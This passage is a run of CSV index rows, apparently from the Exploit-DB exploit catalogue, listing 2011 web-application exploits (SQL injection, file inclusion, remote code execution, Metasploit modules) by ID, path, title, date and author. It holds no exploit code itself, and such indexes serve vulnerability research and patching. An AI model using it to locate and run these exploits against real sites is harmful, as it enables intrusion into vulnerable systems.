+17778,exploits/php/webapps/17778.txt,"WordPress Plugin Zotpress 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",webapps,php, +17779,exploits/php/webapps/17779.txt,"WordPress Plugin oQey Gallery 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",webapps,php, +17782,exploits/php/webapps/17782.txt,"Elite Gaming Ladders 3.6 - SQL Injection",2011-09-05,J.O,webapps,php, +17786,exploits/php/webapps/17786.txt,"Webmobo WB News System - Blind SQL Injection",2011-09-05,"Eyup CELIK",webapps,php, +17789,exploits/php/webapps/17789.txt,"WordPress Plugin Tweet Old Post 3.2.5 - SQL Injection",2011-09-06,sherl0ck_,webapps,php, +17790,exploits/php/webapps/17790.txt,"WordPress Plugin post highlights 2.2 - SQL Injection",2011-09-06,"Miroslav Stampar",webapps,php, +17791,exploits/php/webapps/17791.txt,"WordPress Plugin KNR Author List Widget 2.0.0 - SQL Injection",2011-09-06,"Miroslav Stampar",webapps,php, +17792,exploits/php/webapps/17792.txt,"PlaySms 0.9.5.2 - Remote File Inclusion",2011-09-06,NoGe,webapps,php, +17793,exploits/php/webapps/17793.txt,"WordPress Plugin SCORM Cloud 1.0.6.6 - SQL Injection",2011-09-07,"Miroslav Stampar",webapps,php, +17794,exploits/php/webapps/17794.txt,"WordPress Plugin Eventify - Simple Events 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",webapps,php, +17797,exploits/php/webapps/17797.txt,"WordPress Plugin Paid Downloads 2.01 - SQL Injection",2011-09-08,"Miroslav Stampar",webapps,php, +17798,exploits/php/webapps/17798.txt,"WordPress Plugin Community Events 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",webapps,php, +17800,exploits/php/webapps/17800.txt,"AM4SS 1.2 - Cross-Site Request Forgery (Add Admin)",2011-09-08,"red virus",webapps,php, +17801,exploits/php/webapps/17801.rb,"WordPress Plugin 1 Flash Gallery 1.30 < 1.5.7a - Arbitrary File Upload (Metasploit)",2011-09-08,"Ben Schmidt",webapps,php, +21787,exploits/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",webapps,php, +17807,exploits/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL Injection",2011-09-08,"RiRes Walid",webapps,php, +17808,exploits/php/webapps/17808.txt,"WordPress Plugin WP-Filebase Download Manager 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",webapps,php, +17809,exploits/php/webapps/17809.txt,"WordPress Plugin A to Z Category Listing 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",webapps,php, +17811,exploits/php/webapps/17811.txt,"MYRE Real Estate Software - Multiple Vulnerabilities",2011-09-09,"SecPod Research",webapps,php, +17813,exploits/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB - Multiple Vulnerabilities",2011-09-09,"SecPod Research",webapps,php, +17814,exploits/php/webapps/17814.txt,"WordPress Plugin Event Registration 5.44 - SQL Injection",2011-09-09,serk,webapps,php, +17816,exploits/php/webapps/17816.txt,"WordPress Plugin Tune Library 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",webapps,php, +17818,exploits/php/webapps/17818.txt,"TomatoCart 1.1 - Authenticated Local File Inclusion",2011-09-12,brain[pillow],webapps,php, +17822,exploits/php/webapps/17822.txt,"PHP Support Tickets 2.2 - Code Execution",2011-09-12,brain[pillow],webapps,php, +17823,exploits/php/webapps/17823.txt,"NetCat CMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],webapps,php, +17824,exploits/php/webapps/17824.txt,"Slaed CMS - Code Execution",2011-09-12,brain[pillow],webapps,php, +17825,exploits/php/webapps/17825.txt,"AstroCMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],webapps,php, +17829,exploits/php/webapps/17829.txt,"dotProject 2.1.5 - SQL Injection",2011-09-13,sherl0ck_,webapps,php, +17828,exploits/php/webapps/17828.txt,"WordPress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",webapps,php, +17832,exploits/php/webapps/17832.txt,"WordPress Plugin E-Commerce 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",webapps,php, +17840,exploits/windows/webapps/17840.txt,"Cogent DataHub 7.1.1.63 - Source Disclosure",2011-09-14,"Luigi Auriemma",webapps,windows, +17846,exploits/jsp/webapps/17846.php,"Nortel Contact Recording Centralized Archive 6.5.1 - SQL Injection",2011-09-15,rgod,webapps,jsp, +17850,exploits/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 - 'lang' Local File Inclusion",2011-09-17,LiquidWorm,webapps,php, +17851,exploits/php/webapps/17851.txt,"iManager Plugin 1.2.8 - 'lang' Local File Inclusion",2011-09-17,LiquidWorm,webapps,php, +17852,exploits/php/webapps/17852.txt,"iManager Plugin 1.2.8 - 'd' Arbitrary File Deletion",2011-09-17,LiquidWorm,webapps,php, +17858,exploits/php/webapps/17858.txt,"WordPress Plugin Filedownload 0.1 - 'download.php' Remote File Disclosure",2011-09-19,Septemb0x,webapps,php, +17859,exploits/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 - 'edit.php' HTTP Response Splitting",2011-09-19,LiquidWorm,webapps,php, +17857,exploits/php/webapps/17857.txt,"WordPress Plugin Count per Day 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",webapps,php, +17860,exploits/php/webapps/17860.txt,"WordPress Plugin TheCartPress 1.1.1 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17861,exploits/php/webapps/17861.txt,"WordPress Plugin AllWebMenus 1.1.3 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17862,exploits/php/webapps/17862.txt,"WordPress Plugin WPEasyStats 1.8 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17863,exploits/php/webapps/17863.txt,"WordPress Plugin Annonces 1.2.0.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17864,exploits/php/webapps/17864.txt,"WordPress Plugin Livesig 0.4 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17865,exploits/php/webapps/17865.txt,"WordPress Plugin Disclosure Policy 1.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17866,exploits/php/webapps/17866.txt,"WordPress Plugin Mailing List 1.3.2 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17867,exploits/php/webapps/17867.txt,"WordPress Plugin Zingiri Web Shop 2.2.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17868,exploits/php/webapps/17868.txt,"WordPress Plugin Mini Mail Dashboard Widget 1.36 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17869,exploits/php/webapps/17869.txt,"WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",webapps,php, +17871,exploits/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",webapps,hardware, +17872,exploits/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",webapps,php, +17873,exploits/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",webapps,windows, +17874,exploits/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",webapps,hardware, +17882,exploits/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,webapps,php, +17887,exploits/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php, +17888,exploits/php/webapps/17888.txt,"WordPress Plugin AdRotate 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php, +17891,exploits/php/webapps/17891.txt,"WordPress Plugin CevherShare 2.0 - SQL Injection",2011-09-26,bd0rk,webapps,php, +17894,exploits/php/webapps/17894.txt,"WordPress Plugin Mingle Forum 1.0.31 - SQL Injection",2011-09-27,"Miroslav Stampar",webapps,php, +17895,exploits/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",webapps,php, +17897,exploits/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",webapps,jsp, +17900,exploits/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",webapps,asp, +17898,exploits/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System - SQL Injection",2011-09-27,"Indonesian BlackCoder",webapps,php, +17905,exploits/php/webapps/17905.txt,"Typo3 - File Disclosure",2011-09-29,"Number 7",webapps,php, +17906,exploits/php/webapps/17906.txt,"WordPress Plugin Bannerize 2.8.7 - SQL Injection",2011-09-30,"Miroslav Stampar",webapps,php, +17909,exploits/php/webapps/17909.txt,"Marinet CMS - 'room.php' Blind SQL Injection",2011-09-30,"BHG Security Center",webapps,php, +17911,exploits/php/webapps/17911.php,"Feed on Feeds 0.5 - Remote PHP Code Injection",2011-09-30,EgiX,webapps,php, +17919,exploits/php/webapps/17919.txt,"Banana Dance CMS and Wiki - SQL Injection",2011-10-02,Aodrulez,webapps,php, +17920,exploits/php/webapps/17920.txt,"Vivvo CMS - Local File Inclusion",2011-10-02,JaBrOtxHaCkEr,webapps,php, +17921,exploits/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",webapps,asp, +17922,exploits/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored procedure SQL Injection (Metasploit)",2011-10-02,Metasploit,webapps,cgi, +17924,exploits/jsp/webapps/17924.pl,"JBoss & JMX Console - Misconfigured Deployment Scanner",2011-10-03,y0ug,webapps,jsp, +17925,exploits/php/webapps/17925.txt,"Concrete5 CMS < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",webapps,php, +17926,exploits/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,webapps,php, +17927,exploits/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,webapps,php, +18033,exploits/php/webapps/18033.txt,"Joomla! Component com_yjcontactus - Local File Inclusion",2011-10-25,MeGo,webapps,php, +17935,exploits/php/webapps/17935.txt,"Tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,webapps,php, +17937,exploits/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,webapps,php, +17938,exploits/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,webapps,php, +17941,exploits/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution (Metasploit)",2011-10-07,Metasploit,webapps,linux, +17943,exploits/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,webapps,php, +17944,exploits/php/webapps/17944.txt,"Joomla! Component Time Returns 2.0 - SQL Injection",2011-10-08,kaMtiEz,webapps,php, +17946,exploits/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,webapps,php, +17947,exploits/php/webapps/17947.rb,"Snortreport - '/nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit)",2011-10-09,Metasploit,webapps,php, +17949,exploits/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor (Metasploit)",2011-10-09,Metasploit,webapps,php, +17950,exploits/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",webapps,php, +17951,exploits/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",webapps,php, +17952,exploits/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection",2011-10-10,"Stefan Schurtz",webapps,php, +17970,exploits/php/webapps/17970.txt,"WordPress Plugin WP-SpamFree Spam Plugin - SQL Injection",2011-10-11,cheki,webapps,php, +17972,exploits/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection",2011-10-12,Mario_Vs,webapps,php, +17973,exploits/php/webapps/17973.txt,"WordPress Plugin GD Star Rating 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",webapps,php, +17955,exploits/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,webapps,php, +17956,exploits/php/webapps/17956.txt,"6kbbs - Multiple Vulnerabilities",2011-10-10,"labs insight",webapps,php, +17957,exploits/php/webapps/17957.txt,"Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection",2011-10-10,"Smith Falcon",webapps,php, +17958,exploits/php/webapps/17958.txt,"cotonti CMS 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,webapps,php, +17959,exploits/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,webapps,php, +17961,exploits/php/webapps/17961.txt,"MyBB Advanced Forum Signatures - 'afsignatures-2.0.4' SQL Injection",2011-10-10,Mario_Vs,webapps,php, +17962,exploits/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,webapps,php, +17980,exploits/php/webapps/17980.txt,"WordPress Plugin Contact Form 2.7.5 - SQL Injection",2011-10-14,Skraps,webapps,php, +17983,exploits/php/webapps/17983.txt,"WordPress Plugin Photo Album Plus 4.1.1 - SQL Injection",2011-10-15,Skraps,webapps,php, +17984,exploits/php/webapps/17984.txt,"Ruubikcms 1.1.0 - '/extra/image.php' Local File Inclusion",2011-10-16,"Sangyun YOO",webapps,php, +17987,exploits/php/webapps/17987.txt,"WordPress Plugin BackWPUp 2.1.4 - Code Execution",2011-10-17,"Sense of Security",webapps,php, +17994,exploits/php/webapps/17994.php,"Dolphin 7.0.7 - 'member_menu_queries.php' Remote PHP Code Injection",2011-10-18,EgiX,webapps,php, +17989,exploits/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,webapps,php, +17992,exploits/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php?PATH_INFO' SQL Injection",2011-10-17,flyh4t,webapps,php, +17995,exploits/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,webapps,php, +17997,exploits/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",webapps,php, +17998,exploits/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",webapps,php, +17999,exploits/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure",2011-10-19,"Lagripe-Dz & Mca-Crb",webapps,php, +18000,exploits/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta - 'force_download.php' Local File Inclusion",2011-10-19,"Sangyun YOO",webapps,php, +18001,exploits/php/webapps/18001.txt,"CMS mini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,webapps,php, +18002,exploits/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",webapps,php, +18003,exploits/php/webapps/18003.txt,"fims File Management System 1.2.1a - Multiple Vulnerabilities",2011-10-20,Skraps,webapps,php, +18004,exploits/php/webapps/18004.txt,"Simple Free PHP Forum Script - SQL Injection",2011-10-20,Skraps,webapps,php, +18005,exploits/windows/webapps/18005.txt,"OCS Inventory NG 2.0.1 - Persistent Cross-Site Scripting",2011-10-20,"Nicolas DEROUET",webapps,windows, +18009,exploits/asp/webapps/18009.txt,"Pre Studio Business Cards Designer - SQL Injection",2011-10-20,dr_zig,webapps,asp, +18012,exploits/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI - Persistent Cross-Site Scripting",2011-10-20,"Stefan Schurtz",webapps,multiple, +18013,exploits/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Persistent Cross-Site Scripting",2011-10-20,loneferret,webapps,windows, +18018,exploits/php/webapps/18018.php,"SportsPHool 1.0 - Remote File Inclusion",2011-10-21,cr4wl3r,webapps,php, +18020,exploits/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,webapps,php, +18021,exploits/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (1)",2011-10-23,EgiX,webapps,php, +18022,exploits/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",webapps,php, +18042,exploits/php/webapps/18042.txt,"Joomla! Component Techfolio 1.0 - SQL Injection",2011-10-28,"Chris Russell",webapps,php, +18046,exploits/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",webapps,php, +18031,exploits/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,webapps,php, +18032,exploits/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,webapps,windows, +18035,exploits/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,webapps,php, +18036,exploits/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,webapps,php, +18037,exploits/php/webapps/18037.rb,"phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,webapps,php, +18039,exploits/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,webapps,php, +18045,exploits/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",webapps,php, +18047,exploits/php/webapps/18047.txt,"Joomla! Component com_jeemasms 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",webapps,php, +18048,exploits/php/webapps/18048.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",webapps,php, +18050,exploits/php/webapps/18050.txt,"Joomla! Component HM Community - Multiple Vulnerabilities",2011-10-31,"599eme Man",webapps,php, +18053,exploits/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",webapps,php, +18055,exploits/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,webapps,php, +18056,exploits/php/webapps/18056.txt,"jbShop e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",webapps,php, +18058,exploits/php/webapps/18058.txt,"Joomla! Component Alameda 1.0 - SQL Injection",2011-10-31,kaMtiEz,webapps,php, +18061,exploits/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",webapps,hardware, +18063,exploits/php/webapps/18063.txt,"BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities",2011-11-02,CoBRa_21,webapps,php, +18065,exploits/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - 'loggedInUser' SQL Injection",2011-11-02,LiquidWorm,webapps,php, +18066,exploits/php/webapps/18066.txt,"CaupoShop Pro (2.x < 3.70) Classic 3.01 - Local File Inclusion",2011-11-02,"Rami Salama",webapps,php, +18069,exploits/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,webapps,php, +18070,exploits/php/webapps/18070.txt,"Web File Browser 0.4b14 - File Download",2011-11-03,"Sangyun YOO",webapps,php, +18075,exploits/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,webapps,php, +18076,exploits/php/webapps/18076.txt,"Advanced Poll 2.02 - SQL Injection",2011-11-04,"Yassin Aboukir",webapps,php, +18077,exploits/windows/webapps/18077.txt,"HP Data Protector Media Operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",webapps,windows, +18081,exploits/php/webapps/18081.txt,"WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure",2011-11-04,"red virus",webapps,php, +18083,exploits/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php, +18084,exploits/php/webapps/18084.php,"PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php, +18085,exploits/php/webapps/18085.php,"aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php, +18088,exploits/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,webapps,php, +18090,exploits/php/webapps/18090.txt,"LabStoRe 1.5.4 - SQL Injection",2011-11-07,muuratsalo,webapps,php, +18091,exploits/php/webapps/18091.txt,"OrderSys 1.6.4 - SQL Injection",2011-11-07,muuratsalo,webapps,php, +18095,exploits/php/webapps/18095.txt,"11in1 CMS 1.0.1 - 'do.php' CRLF Injection",2011-11-08,LiquidWorm,webapps,php, +18099,exploits/php/webapps/18099.txt,"osCSS2 - '_ID' Local file Inclusion",2011-11-09,"Stefan Schurtz",webapps,php, +18100,exploits/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,webapps,php, +18101,exploits/hardware/webapps/18101.pl,"COMTREND CT-5624 Router - Root/Support Password Disclosure/Change",2011-11-09,"Todor Donev",webapps,hardware, +18108,exploits/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,webapps,php, +18110,exploits/php/webapps/18110.txt,"Mambo 4.x - 'Zorder' SQL Injection",2011-11-13,"KraL BeNiM",webapps,php, +18111,exploits/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - 'ajax_save_name.php' Remote Code Execution",2011-11-13,EgiX,webapps,php, +18132,exploits/php/webapps/18132.php,"Support Incident Tracker 3.65 - 'translate.php' Remote Code Execution",2011-11-19,EgiX,webapps,php, +18114,exploits/php/webapps/18114.txt,"WordPress Plugin AdRotate 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",webapps,php, +18115,exploits/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,webapps,php, +18117,exploits/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection",2011-11-15,"Jose Carlos de Arriba",webapps,multiple, +18118,exploits/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq Arbitrary File Upload",2011-11-15,PCA,webapps,php, +18121,exploits/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - 'ajax_save_name.php' Remote Code Execution",2011-11-16,EgiX,webapps,php, +18122,exploits/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",webapps,hardware, +18126,exploits/php/webapps/18126.txt,"WordPress Plugin jetpack - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,webapps,php, +18127,exploits/php/webapps/18127.txt,"Freelancer Calendar 1.01 - SQL Injection",2011-11-19,muuratsalo,webapps,php, +18128,exploits/php/webapps/18128.txt,"Valid tiny-erp 1.6 - SQL Injection",2011-11-19,muuratsalo,webapps,php, +18129,exploits/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,webapps,php, +18131,exploits/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,webapps,php, +18148,exploits/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection",2011-11-23,Dante90,webapps,php, +18149,exploits/php/webapps/18149.php,"PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)",2011-11-23,EgiX,webapps,php, +18151,exploits/php/webapps/18151.php,"Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-24,"Adel SBM",webapps,php, +18153,exploits/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",webapps,cgi, +18155,exploits/php/webapps/18155.txt,"Zabbix 1.8.4 - 'popup.php' SQL Injection",2011-11-24,"Marcio Almeida",webapps,php, +18156,exploits/php/webapps/18156.txt,"PHP video script - SQL Injection",2011-11-25,longrifle0x,webapps,php, +19400,exploits/php/webapps/19400.txt,"WordPress Plugin Website FAQ 1.0 - SQL Injection",2012-06-26,"Chris Kellum",webapps,php, +18167,exploits/php/webapps/18167.txt,"JQuery-Real-Person plugin - Bypass Captcha",2011-11-28,Alberto_García_Illera,webapps,php, +18177,exploits/php/webapps/18177.txt,"WikkaWiki 1.3.2 - Multiple Vulnerabilities",2011-11-30,EgiX,webapps,php, +18185,exploits/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",webapps,php, +18192,exploits/php/webapps/18192.txt,"Joomla! Component com_jobprofile - SQL Injection",2011-12-02,kaMtiEz,webapps,php, +18193,exploits/php/webapps/18193.txt,"WSN Classifieds 6.2.12/6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,webapps,php, +18198,exploits/php/webapps/18198.php,"Family Connections CMS 2.5.0/2.7.1 - 'less.php' Remote Command Execution",2011-12-04,mr_me,webapps,php, +18202,exploits/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",webapps,php, +18207,exploits/php/webapps/18207.txt,"Alstrasoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,webapps,php, +18208,exploits/php/webapps/18208.rb,"Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,webapps,php, +18215,exploits/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,webapps,php, +18217,exploits/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,webapps,php, +18218,exploits/php/webapps/18218.txt,"Joomla! Component com_qcontacts 1.0.6 - SQL Injection",2011-12-08,Don,webapps,php, +18210,exploits/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,webapps,php, +18212,exploits/php/webapps/18212.txt,"phpBB MyPage Plugin - SQL Injection",2011-12-07,CrazyMouse,webapps,php, +18213,exploits/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution",2011-12-07,EgiX,webapps,php, +18214,exploits/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection / Privilege Escalation",2011-12-07,The:Paradox,webapps,php, +18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php, +18224,exploits/php/webapps/18224.php,"Docebo Lms 4.0.4 - 'Messages' Remote Code Execution",2011-12-09,mr_me,webapps,php, +18230,exploits/php/webapps/18230.txt,"Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-12-10,"Ahmed Elhady Mohamed",webapps,php, +18231,exploits/php/webapps/18231.txt,"WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection",2011-12-11,Saif,webapps,php, +18232,exploits/php/webapps/18232.txt,"FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",webapps,php, +18233,exploits/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,webapps,php, +18236,exploits/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,webapps,php, +18239,exploits/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,webapps,php, +18243,exploits/php/webapps/18243.rb,"PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (2) (Metasploit)",2011-12-14,Metasploit,webapps,php, +18246,exploits/php/webapps/18246.txt,"Seotoaster - SQL Injection",2011-12-16,"Stefan Schurtz",webapps,php, +18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple, +18248,exploits/php/webapps/18248.pl,"mPDF 5.3 - File Disclosure",2011-12-16,ZadYree,webapps,php, +18249,exploits/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,webapps,php, +18250,exploits/php/webapps/18250.txt,"DotA OpenStats 1.3.9 - SQL Injection",2011-12-19,HvM17,webapps,php, +18251,exploits/php/webapps/18251.txt,"Joomla! Component com_dshop - SQL Injection",2011-12-19,CoBRa_21,webapps,php, +18259,exploits/php/webapps/18259.txt,"Infoproject Business Hero - Multiple Vulnerabilities",2011-12-21,LiquidWorm,webapps,php, +18260,exploits/jsp/webapps/18260.txt,"Barracuda Control Center 620 - Multiple Web Vulnerabilities",2011-12-21,Vulnerability-Lab,webapps,jsp, +18261,exploits/php/webapps/18261.txt,"SpamTitan 5.08 - Multiple Vulnerabilities",2011-12-21,Vulnerability-Lab,webapps,php, 